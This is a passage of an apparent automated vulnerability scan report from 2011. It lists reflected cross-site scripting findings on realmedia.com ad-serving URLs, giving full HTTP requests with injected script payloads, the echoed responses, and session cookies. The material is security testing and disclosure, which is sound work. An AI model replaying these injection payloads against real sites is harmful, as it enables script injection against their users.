Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:59 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|R10M5i|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:01 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "101155000010000511001a8130"-alert(1)-"538826cf67a";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.678. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6267"><script>alert(1)</script>8e69d18030e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediae6267"><script>alert(1)</script>8e69d18030e/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:51 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediae6267"><script>alert(1)</script>8e69d18030e/Retarget_Secure/469969609/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.679. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc91"><script>alert(1)</script>55a85194b52 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure7cc91"><script>alert(1)</script>55a85194b52/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 260
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:56 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure7cc91"><script>alert(1)</script>55a85194b52/L18/498250968/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?498250968" TARGET=_blank>

4.680. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398f7"><script>alert(1)</script>09622cac1b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3398f7"><script>alert(1)</script>09622cac1b2?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:01 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1754566200/Bottom3398f7"><script>alert(1)</script>09622cac1b2/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.681. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab3a"-alert(1)-"65a69611e7a was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=1011550000100005110018ab3a"-alert(1)-"65a69611e7a HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|R10M5i|O10M5l|R10M5p|O10M5x|R10M62|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:48 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "1011550000100005110018ab3a"-alert(1)-"65a69611e7a";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.682. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fa55"><script>alert(1)</script>2cda01ab3c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia7fa55"><script>alert(1)</script>2cda01ab3c/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:03 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia7fa55"><script>alert(1)</script>2cda01ab3c/Retarget_Secure/1075022930/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.683. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a984"><script>alert(1)</script>4173fc658aa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure4a984"><script>alert(1)</script>4173fc658aa/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:08 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure4a984"><script>alert(1)</script>4173fc658aa/L18/2146251053/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?2146251053" TARGET=_blank>

4.684. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a322"><script>alert(1)</script>341cdb21cb0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom31a322"><script>alert(1)</script>341cdb21cb0?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:13 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/955407605/Bottom31a322"><script>alert(1)</script>341cdb21cb0/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.685. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12776"-alert(1)-"7163b7e534f was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=10115500001000051100112776"-alert(1)-"7163b7e534f HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:52 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|R10M5V|O10M5l|R10M5p|R10M5x|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:54 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "10115500001000051100112776"-alert(1)-"7163b7e534f";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.686. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59ab"><script>alert(1)</script>b4e2983415 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediaf59ab"><script>alert(1)</script>b4e2983415/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:09 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediaf59ab"><script>alert(1)</script>b4e2983415/Retarget_Secure/486907874/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.687. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6b6"><script>alert(1)</script>1d151c1f552 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securecf6b6"><script>alert(1)</script>1d151c1f552/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
